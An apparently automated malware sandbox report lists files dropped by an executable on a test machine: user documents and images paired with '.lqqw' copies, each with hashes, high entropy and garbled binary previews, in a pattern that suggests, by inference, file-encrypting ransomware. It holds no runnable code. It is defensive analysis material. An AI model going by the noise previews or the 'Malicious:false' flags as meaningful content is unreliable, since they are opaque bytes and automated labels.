                                                                                                                                                                                                    C:\Users\user\Documents\QCOILOQIKC.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.823629979573147
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:na4rqcrQd3XoR9TymzQ1kyX1rPg1G3XciQjjQy+MGbD:a42YQd3SgQyxoG3XcRjjQy+MUD
                                                                                                                                                                                                    MD5:B7AFAD0AB6D7C7FA4FCB72C76C91A077
                                                                                                                                                                                                    SHA1:281B03A7AC657B823909E00D469C296678CA4328
                                                                                                                                                                                                    SHA-256:8CEDAA7F8BCD72A8644E5B293EFE30F5EB27FFD48BBF3A16FCE8816DDB350A72
                                                                                                                                                                                                    SHA-512:5488F39769FBDD7A598DA8C2D0941BE6667F1D521125BDBE989DFBBDB9536E4B6F76290145A04DA14036A9C5DAC90B72C64BD4B748EF2C4189B5B2AEB75BC31E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......t...8..(q=..n.$.....{..A...&....V=..P.R.5d>..|.p..K>...4..#...SP....@..4$5....O..x@2.KU.]./..}".....%s{.i...3.z<'.8..[. .l_3v.c..9o...s!.8B#.].D..V..k.J.m.z....!S.......Z...0|..0E..R~S..._.l...7dn.k...WF..0......q...oz|c.$.i`.c.....)..k....[.A........:......EV..%.._..jU....Y..Q.....[..e..2...0..@.W...2....M...k...F..})I.........q./....G_.S{.|"..!.rg..=AHC....1F.J..E]*....-.'^.YCP*.....^#o.x...p5.L..nDR.e...1?.....'..HW.*./.}..J.Q.4V $.L.B..r..G.r&...P..[e...>1Z.:a5..o...Q...|....D..f<>.!e....].NV.LLr..:.[.0gk........-...A<.s...-.......=..G../.f`.j....6...........%..)T..*.G...3.>9d.}.......a......'.b.N.......L.....hA...8o9.,....8~./V~.....B...........T~..V.5..yU.Rv.=.....C^[.$r...<b,%'.nWe.....W....R35S|{^*..L..x.....U`....V.3..-'.;...$N..}......V*7..7.H.....F{.3.V)....3.....U.>..;.z..p..f ....<...<*..p.].."/v.''.....?...o....i....q..K.y....`.O.|D.....j.fDz.M,s.45..q.+.b.]im.S.....*..q.#>...s6.J.k.....5...F..J4..&.z}R...P..q.l+.-...]An
                                                                                                                                                                                                    C:\Users\user\Documents\QCOILOQIKC.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.823629979573147
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:na4rqcrQd3XoR9TymzQ1kyX1rPg1G3XciQjjQy+MGbD:a42YQd3SgQyxoG3XcRjjQy+MUD
                                                                                                                                                                                                    MD5:B7AFAD0AB6D7C7FA4FCB72C76C91A077
                                                                                                                                                                                                    SHA1:281B03A7AC657B823909E00D469C296678CA4328
                                                                                                                                                                                                    SHA-256:8CEDAA7F8BCD72A8644E5B293EFE30F5EB27FFD48BBF3A16FCE8816DDB350A72
                                                                                                                                                                                                    SHA-512:5488F39769FBDD7A598DA8C2D0941BE6667F1D521125BDBE989DFBBDB9536E4B6F76290145A04DA14036A9C5DAC90B72C64BD4B748EF2C4189B5B2AEB75BC31E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......t...8..(q=..n.$.....{..A...&....V=..P.R.5d>..|.p..K>...4..#...SP....@..4$5....O..x@2.KU.]./..}".....%s{.i...3.z<'.8..[. .l_3v.c..9o...s!.8B#.].D..V..k.J.m.z....!S.......Z...0|..0E..R~S..._.l...7dn.k...WF..0......q...oz|c.$.i`.c.....)..k....[.A........:......EV..%.._..jU....Y..Q.....[..e..2...0..@.W...2....M...k...F..})I.........q./....G_.S{.|"..!.rg..=AHC....1F.J..E]*....-.'^.YCP*.....^#o.x...p5.L..nDR.e...1?.....'..HW.*./.}..J.Q.4V $.L.B..r..G.r&...P..[e...>1Z.:a5..o...Q...|....D..f<>.!e....].NV.LLr..:.[.0gk........-...A<.s...-.......=..G../.f`.j....6...........%..)T..*.G...3.>9d.}.......a......'.b.N.......L.....hA...8o9.,....8~./V~.....B...........T~..V.5..yU.Rv.=.....C^[.$r...<b,%'.nWe.....W....R35S|{^*..L..x.....U`....V.3..-'.;...$N..}......V*7..7.H.....F{.3.V)....3.....U.>..;.z..p..f ....<...<*..p.].."/v.''.....?...o....i....q..K.y....`.O.|D.....j.fDz.M,s.45..q.+.b.]im.S.....*..q.#>...s6.J.k.....5...F..J4..&.z}R...P..q.l+.-...]An
                                                                                                                                                                                                    C:\Users\user\Documents\TQDFJHPUIU.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.836915090515535
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:TKyj8dWcdTAd7nF3mHNvKcGEiIqZNt9Gq96QqVASwHjn5WUhhCI/bD:T7PcdAdZ2HNvJG/nZ/9LERASsxhhXD
                                                                                                                                                                                                    MD5:7065E131A62B793F256EDE87BA5921A6
                                                                                                                                                                                                    SHA1:86C8A634D8B954625F669E73F87F099BDA9485BD
                                                                                                                                                                                                    SHA-256:950ED424485E840AEB450364F725C33A755337E48D18D6D1FAACB3162A344D0C
                                                                                                                                                                                                    SHA-512:5C67BA20E069CAA517BE1E959EE92A57A25D85AB1C8B3FE82DDA2AF116685377FB8D004555AEABB55274E8AF258E9B31EC0CE3E22D78697734554E6AC4A670C6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..P..N.QUKT.....6..Y.....lD.I.....$#.^Dv...:mD.4m.%B..[.w%.0......3.[uY.q..J....>. `....(.U"4J."%...;cs'.w..zcN.!J......<.&.d.M._.bGez...$%2.........\l.z.8l:....7w...^.E[....*......=Y...[!yBp0.^3n..Y........P...im.A.v....%"e.\.\.K...4.l+.T....:G.....d<9...;....a..{F...Y/....K_..8G?.p...^...!..Q.H3..v......+.W.6c.#.w.MreC.~Gd.BR...8.....x...1j..w.~2..|.Dml./.f~.?...g..L~NA.du.N.'..).S.Mr.h.....W.0.=ph.y/....%5g.........h..a...5C.t.h......-.......(.... .B.jqOC......*Bmq.}Y./..B..c*...Ru..-.[_..%.2v..O&N.....>>...~..%..Z.}........`.b.^.....r.6..lf_p.L=1.....?3.-.D..}o[P...{[...=Pe....S......._.._E.Z.;.,\..S._..k&...5h..v....!..Q.w.Gi.g.&...Y.%.....Y2.....P........&F..5F......).,..F...r.R+..wv.4}.x..pKF!.FJtnk.<.8...92...~.~.y..[^...8.j..........ZZ..m.\.]..eAK.oqq...i.8.8Gx....P......;.........2.Q.y...o.n.p..0R ].z...YU..[.l...w......:.SCiy>..../.../."mDv..t...4..%C.V.CW....=.i.z.x.7...'..+..L9...Y.;...0.^J.h.(....ae.a.}..._f...
                                                                                                                                                                                                    C:\Users\user\Documents\TQDFJHPUIU.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.836915090515535
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:TKyj8dWcdTAd7nF3mHNvKcGEiIqZNt9Gq96QqVASwHjn5WUhhCI/bD:T7PcdAdZ2HNvJG/nZ/9LERASsxhhXD
                                                                                                                                                                                                    MD5:7065E131A62B793F256EDE87BA5921A6
                                                                                                                                                                                                    SHA1:86C8A634D8B954625F669E73F87F099BDA9485BD
                                                                                                                                                                                                    SHA-256:950ED424485E840AEB450364F725C33A755337E48D18D6D1FAACB3162A344D0C
                                                                                                                                                                                                    SHA-512:5C67BA20E069CAA517BE1E959EE92A57A25D85AB1C8B3FE82DDA2AF116685377FB8D004555AEABB55274E8AF258E9B31EC0CE3E22D78697734554E6AC4A670C6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..P..N.QUKT.....6..Y.....lD.I.....$#.^Dv...:mD.4m.%B..[.w%.0......3.[uY.q..J....>. `....(.U"4J."%...;cs'.w..zcN.!J......<.&.d.M._.bGez...$%2.........\l.z.8l:....7w...^.E[....*......=Y...[!yBp0.^3n..Y........P...im.A.v....%"e.\.\.K...4.l+.T....:G.....d<9...;....a..{F...Y/....K_..8G?.p...^...!..Q.H3..v......+.W.6c.#.w.MreC.~Gd.BR...8.....x...1j..w.~2..|.Dml./.f~.?...g..L~NA.du.N.'..).S.Mr.h.....W.0.=ph.y/....%5g.........h..a...5C.t.h......-.......(.... .B.jqOC......*Bmq.}Y./..B..c*...Ru..-.[_..%.2v..O&N.....>>...~..%..Z.}........`.b.^.....r.6..lf_p.L=1.....?3.-.D..}o[P...{[...=Pe....S......._.._E.Z.;.,\..S._..k&...5h..v....!..Q.w.Gi.g.&...Y.%.....Y2.....P........&F..5F......).,..F...r.R+..wv.4}.x..pKF!.FJtnk.<.8...92...~.~.y..[^...8.j..........ZZ..m.\.]..eAK.oqq...i.8.8Gx....P......;.........2.Q.y...o.n.p..0R ].z...YU..[.l...w......:.SCiy>..../.../."mDv..t...4..%C.V.CW....=.i.z.x.7...'..+..L9...Y.;...0.^J.h.(....ae.a.}..._f...
                                                                                                                                                                                                    C:\Users\user\Documents\TQDFJHPUIU.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.846072180154287
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:gPqhv8GqY1krGw6tJJ5sNxVS1pbnXrax1Vt13ZeVC9yo0625j8UBrzM7wdwiSs7z:Aqhv8mYGHtJJiN7Upbne7VTZeM26Gj8a
                                                                                                                                                                                                    MD5:C0974D8BB5B45F3924BB02822FC6D878
                                                                                                                                                                                                    SHA1:D49AC98E6044E8A86C7BEFB10B79703EF2EE69F7
                                                                                                                                                                                                    SHA-256:6C1AAB7B4ED4142FC2F05A0D9B80E4746410FDF1C939D0C476A0D32A85335E17
                                                                                                                                                                                                    SHA-512:9B9ABEDE73B6730CEFC7B4DD7353DB93BF93C3B0081586FBA47EFA43EB8F66FDACF39E8A8CE4446EBCC78F215F80B0A69A6FEC1E228A4F3A2BE577027C616494
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...'.w.c0S4..",.......\.it..l...Z.c...&.n...E..~?;..:....{h..8{.x...Y4$......H.D...Avm6..R.o...B..g.U..R..D..v.t.@.hR1..3`x.Jp.#..[.n.'..@3........F.Q..;NH.It..< ._..a...\....f.o...*..m0z...o..#...(......X.sb.^.R>..S.<..f.../(sw=...].....aZ*.....>]..?.Z..^...Q*q..+..a.U.E....DK...Fqo@.t.....H...;u.1...h.&x.].....fr..dZ.....}....J....R.3(.WU...%.LD...].....i.....L%..u......P..H*.R.c..;.(.3..#/...?..O.L.<.....eH...g.eS&.9Q..'...=....r...f...P...@$.Q...,.x..1p<.cv ......e.l..,l.k..Mx9...uU.G..H,UE..hNv.6.Z.L1.f..V5..RP._ N:C...-.../..q.....x.(`.......TR..I..L,g.[3}..k....h...L.S.U<....).6k........1Xx....O...c...u...N......p..)......Y.........UJO..%.UL.U..f 2.....}Z.T...Z.W.2~AJ........!..Ch9.y.)...~.2....KI.-......:Z.").K...1...br...........N.......%l........FV...*z!>..,g..'?..$..'.P....p...J...\..fGE.B.9..1....Cgbg..foG...D.x..H.)....]`Sy.(......}.........u....6C'.x.k.~ ..F......5..{.....8......^..Fb....E..*..V.6;f..g... .t....3.=f..
                                                                                                                                                                                                    C:\Users\user\Documents\TQDFJHPUIU.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.846072180154287
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:gPqhv8GqY1krGw6tJJ5sNxVS1pbnXrax1Vt13ZeVC9yo0625j8UBrzM7wdwiSs7z:Aqhv8mYGHtJJiN7Upbne7VTZeM26Gj8a
                                                                                                                                                                                                    MD5:C0974D8BB5B45F3924BB02822FC6D878
                                                                                                                                                                                                    SHA1:D49AC98E6044E8A86C7BEFB10B79703EF2EE69F7
                                                                                                                                                                                                    SHA-256:6C1AAB7B4ED4142FC2F05A0D9B80E4746410FDF1C939D0C476A0D32A85335E17
                                                                                                                                                                                                    SHA-512:9B9ABEDE73B6730CEFC7B4DD7353DB93BF93C3B0081586FBA47EFA43EB8F66FDACF39E8A8CE4446EBCC78F215F80B0A69A6FEC1E228A4F3A2BE577027C616494
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...'.w.c0S4..",.......\.it..l...Z.c...&.n...E..~?;..:....{h..8{.x...Y4$......H.D...Avm6..R.o...B..g.U..R..D..v.t.@.hR1..3`x.Jp.#..[.n.'..@3........F.Q..;NH.It..< ._..a...\....f.o...*..m0z...o..#...(......X.sb.^.R>..S.<..f.../(sw=...].....aZ*.....>]..?.Z..^...Q*q..+..a.U.E....DK...Fqo@.t.....H...;u.1...h.&x.].....fr..dZ.....}....J....R.3(.WU...%.LD...].....i.....L%..u......P..H*.R.c..;.(.3..#/...?..O.L.<.....eH...g.eS&.9Q..'...=....r...f...P...@$.Q...,.x..1p<.cv ......e.l..,l.k..Mx9...uU.G..H,UE..hNv.6.Z.L1.f..V5..RP._ N:C...-.../..q.....x.(`.......TR..I..L,g.[3}..k....h...L.S.U<....).6k........1Xx....O...c...u...N......p..)......Y.........UJO..%.UL.U..f 2.....}Z.T...Z.W.2~AJ........!..Ch9.y.)...~.2....KI.-......:Z.").K...1...br...........N.......%l........FV...*z!>..,g..'?..$..'.P....p...J...\..fGE.B.9..1....Cgbg..foG...D.x..H.)....]`Sy.(......}.........u....6C'.x.k.~ ..F......5..{.....8......^..Fb....E..*..V.6;f..g... .t....3.=f..
                                                                                                                                                                                                    C:\Users\user\Documents\ZGGKNSUKOP.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8450555347565984
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:7RZdQpPEBLvZE8LzbeihZBg5hXp9L+M6NwHeVTPIk4pb2wZ44g95/aABeO2gIbD:7Td2gdE89gXZ9Lv6NwHws6Y44EOO2gSD
                                                                                                                                                                                                    MD5:6D74CAC39D27034A7BFD90C7A9F68AE0
                                                                                                                                                                                                    SHA1:8A06C9854CDA06360B11A705E8D88179066F768A
                                                                                                                                                                                                    SHA-256:C44F13B60846B27F9258A7C38560D9ED82BF0A2DECF3F6C7E0724805574D99F0
                                                                                                                                                                                                    SHA-512:C2392F1E57FF1910B6542EACA03273349A8CCDFD962FA6CEFD6AF7E2CE93F8FD599BF40DED6354ABCEF473D27E39BF5C477699237C589F0C5373F6329B781696
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: DE.X...{.)6..l...a.E5.....l.......:.....Py.n.E...i(.c.\...A+...Iy^.......V_.V..X.B|Y~...ch.q...\...2.B..n..r..`...8..V...M..%....|.TaG..!O*.....r.W.^....Z.T.[G...B.:....M..0......D'Y~..g...N.;t.....cf?.(qa....F..31YLd}.X5i...@.&.&.g....&h+..`.e"$.J7...j.7.....R...._L.hX..k..+...J#...r.LB..j5"/...../......3_..W.3..q|.rC+.m.....^..>Ix@.&........./.i...BIA9.;pG.s.T..W.wW.L-....,G@.$MXZ.>....]...<.,.".......v#;...Y~..8K{..V.....e....-.{w...2.Q..q...T.>.C<z..R...$^(.IX)E....0},..r..k$. ...K.t.3EG..Q7....p....J|...<r.m...!..)...`j..w,.t..{?.K-.H.`\..zR.|.....+.k2..dD..ei~..T....bL.6TJ7........$..."....` .|.._..26n`...fJ2"..7$U.&._.j....\./....:#.....G..><9|.\.o.3J.{ Q\.@.W8...u.%..k..scL.&.9.x..QC..7.8.....).. .)..........7...K.....rSK.kd.Q....~..$';;..%......l2..]....3....b..X;...M.9.R?....FI@f?...f/\s0.......f....s...R.HJ..6..z..v.j..........S2.....`.X,G]/...jZ...,.....U...-..w(.b...2D..0.O..a..|.....@]yO.g..r[.....f........s.R.y...[...|
                                                                                                                                                                                                    C:\Users\user\Documents\ZGGKNSUKOP.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8450555347565984
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:7RZdQpPEBLvZE8LzbeihZBg5hXp9L+M6NwHeVTPIk4pb2wZ44g95/aABeO2gIbD:7Td2gdE89gXZ9Lv6NwHws6Y44EOO2gSD
                                                                                                                                                                                                    MD5:6D74CAC39D27034A7BFD90C7A9F68AE0
                                                                                                                                                                                                    SHA1:8A06C9854CDA06360B11A705E8D88179066F768A
                                                                                                                                                                                                    SHA-256:C44F13B60846B27F9258A7C38560D9ED82BF0A2DECF3F6C7E0724805574D99F0
                                                                                                                                                                                                    SHA-512:C2392F1E57FF1910B6542EACA03273349A8CCDFD962FA6CEFD6AF7E2CE93F8FD599BF40DED6354ABCEF473D27E39BF5C477699237C589F0C5373F6329B781696
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: DE.X...{.)6..l...a.E5.....l.......:.....Py.n.E...i(.c.\...A+...Iy^.......V_.V..X.B|Y~...ch.q...\...2.B..n..r..`...8..V...M..%....|.TaG..!O*.....r.W.^....Z.T.[G...B.:....M..0......D'Y~..g...N.;t.....cf?.(qa....F..31YLd}.X5i...@.&.&.g....&h+..`.e"$.J7...j.7.....R...._L.hX..k..+...J#...r.LB..j5"/...../......3_..W.3..q|.rC+.m.....^..>Ix@.&........./.i...BIA9.;pG.s.T..W.wW.L-....,G@.$MXZ.>....]...<.,.".......v#;...Y~..8K{..V.....e....-.{w...2.Q..q...T.>.C<z..R...$^(.IX)E....0},..r..k$. ...K.t.3EG..Q7....p....J|...<r.m...!..)...`j..w,.t..{?.K-.H.`\..zR.|.....+.k2..dD..ei~..T....bL.6TJ7........$..."....` .|.._..26n`...fJ2"..7$U.&._.j....\./....:#.....G..><9|.\.o.3J.{ Q\.@.W8...u.%..k..scL.&.9.x..QC..7.8.....).. .)..........7...K.....rSK.kd.Q....~..$';;..%......l2..]....3....b..X;...M.9.R?....FI@f?...f/\s0.......f....s...R.HJ..6..z..v.j..........S2.....`.X,G]/...jZ...,.....U...-..w(.b...2D..0.O..a..|.....@]yO.g..r[.....f........s.R.y...[...|
                                                                                                                                                                                                    C:\Users\user\Downloads\BJZFPPWAPT.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.828588310394772
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:QiVQnV+fPySpkjl6G9iJ8ibBw4tsWLStxNlT++k13y9SCZgD8V2SruaOHhTz8UbD:QAWmPyGkjAQimTT2dycCKEhuasTz8+D
                                                                                                                                                                                                    MD5:05180069CBE1A05296C1697B20E71D26
                                                                                                                                                                                                    SHA1:61D0814A4DD8A151467764CE88AFF8779E0443A6
                                                                                                                                                                                                    SHA-256:B3EC2C4ED42BFFA03B26215BDFC8CB6181EC43E945D5B300CCDB83E0234F3F92
                                                                                                                                                                                                    SHA-512:B80C17774232C2C1627136CD0B584FE6446F5C24742CA5427277515792680082B7BEBA5A844832163856BD5FAB7E410904A9D3F7BBB54FAE89BBC328347A367E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: :*.U....!../...V..!.V.m./iY.k.o..FU..)..i. Hr....Q./.K^.z.A..s..b..3...T..bV..L.3.b8..K9.<..7Y.aZ.4.z/< ..4.......3.Uj9..c...V..U.9..J^.~.b.L."s..........6VK.."/..N.zp..8...]....jE...@..s..~...a.op...z......x.....k.~t.c.5K.W...y..fG...p....L.bU....p.+.t.e.$.[f...%!..a...>..{.JU..T.......=.m..f..p..+....^.....?...q..b=.l....l...W.?4'.P......b.h....j<2.rd..Zv..6....j..d.2...f..(....-......Tv..[...5..q...n4(.(...U..b.x.6t..t1.[..g..|Y.h_...*._..x>..F8......4.e..l.Hu....4.O....7z g...+U\..*+..........]......q.......z.......!hw7..~...J.?...(....m......Dv......|.I..yZB>.T....k+.Rq..z.P.KF.;I.....chP.../B.7..Xg_jW4vJ...'G.....l4...W.....B|..)qx7.5. ~G-..t....'P.+<z.+.<...Z...W.$.....'.@.$-....V..$..O./!....$tiK(..L..g..Hp...(...e....>RY..X[.tG.eF....v.{...,T...)....u.M.g.Cy.^.....r.w........r..bPZSk..:ETyjb:....K}.}.].Ghp;.&5..a.;.[.^Y!...pM<b,.9..XO.(...H.D.....Q.....u{..n|.....A...{.U0...~.f`./.-g.J. H.TX.WF.s....a.!..'.B....|../<~.
                                                                                                                                                                                                    C:\Users\user\Downloads\BJZFPPWAPT.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.828588310394772
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:QiVQnV+fPySpkjl6G9iJ8ibBw4tsWLStxNlT++k13y9SCZgD8V2SruaOHhTz8UbD:QAWmPyGkjAQimTT2dycCKEhuasTz8+D
                                                                                                                                                                                                    MD5:05180069CBE1A05296C1697B20E71D26
                                                                                                                                                                                                    SHA1:61D0814A4DD8A151467764CE88AFF8779E0443A6
                                                                                                                                                                                                    SHA-256:B3EC2C4ED42BFFA03B26215BDFC8CB6181EC43E945D5B300CCDB83E0234F3F92
                                                                                                                                                                                                    SHA-512:B80C17774232C2C1627136CD0B584FE6446F5C24742CA5427277515792680082B7BEBA5A844832163856BD5FAB7E410904A9D3F7BBB54FAE89BBC328347A367E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: :*.U....!../...V..!.V.m./iY.k.o..FU..)..i. Hr....Q./.K^.z.A..s..b..3...T..bV..L.3.b8..K9.<..7Y.aZ.4.z/< ..4.......3.Uj9..c...V..U.9..J^.~.b.L."s..........6VK.."/..N.zp..8...]....jE...@..s..~...a.op...z......x.....k.~t.c.5K.W...y..fG...p....L.bU....p.+.t.e.$.[f...%!..a...>..{.JU..T.......=.m..f..p..+....^.....?...q..b=.l....l...W.?4'.P......b.h....j<2.rd..Zv..6....j..d.2...f..(....-......Tv..[...5..q...n4(.(...U..b.x.6t..t1.[..g..|Y.h_...*._..x>..F8......4.e..l.Hu....4.O....7z g...+U\..*+..........]......q.......z.......!hw7..~...J.?...(....m......Dv......|.I..yZB>.T....k+.Rq..z.P.KF.;I.....chP.../B.7..Xg_jW4vJ...'G.....l4...W.....B|..)qx7.5. ~G-..t....'P.+<z.+.<...Z...W.$.....'.@.$-....V..$..O./!....$tiK(..L..g..Hp...(...e....>RY..X[.tG.eF....v.{...,T...)....u.M.g.Cy.^.....r.w........r..bPZSk..:ETyjb:....K}.}.].Ghp;.&5..a.;.[.^Y!...pM<b,.9..XO.(...H.D.....Q.....u{..n|.....A...{.U0...~.f`./.-g.J. H.TX.WF.s....a.!..'.B....|../<~.
                                                                                                                                                                                                    C:\Users\user\Downloads\CZQKSDDMWR.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.842748004579248
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KYf45fX6LfI1LmLPAzy5Mu19QFQgVS7BmkDDQ2bHFX3ZpNHQT4xgtubD:PvMLmoe5Mu19cJWhnp9EMD
                                                                                                                                                                                                    MD5:1D6C60AE8C4853C18E2A183F35AB32C8
                                                                                                                                                                                                    SHA1:CC2862C1756C01A94ACDC046649F2B11236AF436
                                                                                                                                                                                                    SHA-256:41115C837DA92E36C61C0A629001CC07E9D4D85FE96901D5266976EEEF3D765B
                                                                                                                                                                                                    SHA-512:8670DAE17964517D22D46BDC7A1973DE0451205EC24327FBA4C3BE35D413BB44941556B911CC24CD1346BBECDD2973955022EFC7FAD09FAEEE81DB6BD98444DA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..M,...V..b........~}..B.=r......D.&,.W../`...8n.TRS..5=~6..N.G.u.=.<.CY..W.....T.,<9.'............1v...8.i-......WO.l.Mo;.k.....F....N$.D.Q..o.o. 4b...BV.h{.\..P,.4...J..H...G..#...n,.!..CT.t(..:......+^....~...h.X*+.{..*.SD`.|yJ...wy.......D.{,..{..A..{B.%i,..T.m........[..r#.o...e.VD.:....2}..+.2.i.M...i.xj..Q.ki..&..l'.*j...~Q.xD{.....V..p.b.3!.....>..p.F.i.2...*.?.}U..h...$.....(..}.4x}y.1.*...b.!+.D.....E{..3.......B)I..4[|&4.N.....0..3.{..i...!.u4........n...X.^1...#.?t...J..{.-.q....b.R_\fS..|O......TS5.h.#...J.!m>N.t..l..8h|.....3...^.%..........w.'ks...."...0...p......4.....?..KOn.....W.R.a-^...@6.~z.7.dJJ....._..'._.................?=......_ZNV..oFy........(.N.........................r.2E@.....>D....."....-..*.V....g.q.1a.+.m...z.j..@S.OR..C..c..\l6...\......AwK>......O=)ryj...r&W/....3.Y.~..P..+....f^.................M`F.u.y.@.'..........z...x>.ha..J.d+...-5o.16.(q...i{.u...YugW..ML.@..rR8.......:.%.....M...H....P.1\iBM.=.....O.A
                                                                                                                                                                                                    C:\Users\user\Downloads\CZQKSDDMWR.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.842748004579248
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KYf45fX6LfI1LmLPAzy5Mu19QFQgVS7BmkDDQ2bHFX3ZpNHQT4xgtubD:PvMLmoe5Mu19cJWhnp9EMD
                                                                                                                                                                                                    MD5:1D6C60AE8C4853C18E2A183F35AB32C8
                                                                                                                                                                                                    SHA1:CC2862C1756C01A94ACDC046649F2B11236AF436
                                                                                                                                                                                                    SHA-256:41115C837DA92E36C61C0A629001CC07E9D4D85FE96901D5266976EEEF3D765B
                                                                                                                                                                                                    SHA-512:8670DAE17964517D22D46BDC7A1973DE0451205EC24327FBA4C3BE35D413BB44941556B911CC24CD1346BBECDD2973955022EFC7FAD09FAEEE81DB6BD98444DA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
